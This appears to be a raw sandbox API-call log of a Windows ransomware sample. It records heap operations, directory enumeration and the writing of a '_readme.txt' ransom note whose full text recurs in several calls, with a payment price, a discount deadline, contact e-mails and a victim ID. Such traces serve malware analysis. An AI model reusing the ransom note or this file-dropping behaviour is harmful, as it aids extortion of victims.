1 [0142.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.961] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.961] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.962] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0142.962] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.962] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.962] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.962] PathFindFileNameW (pszPath="") returned="" [0142.962] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.963] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.963] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.963] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x81c) returned 0x9aafb40 [0142.963] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0142.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.963] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.963] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0142.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.963] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.963] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.963] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.963] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.964] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.964] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.964] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.964] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.965] CloseHandle (hObject=0x6f0) returned 1 [0142.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.965] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.965] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.965] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8d16170, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8d16170, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.966] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8d16170, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8d16170, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.966] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.966] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8d16170, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8d16170, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8d16170, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.966] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8d16170, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8d16170, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8d16170, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.966] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fe8 [0142.966] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.966] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.966] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.967] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.967] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283f58 [0142.968] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.968] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283f58 | out: hHeap=0x620000) returned 1 [0142.968] 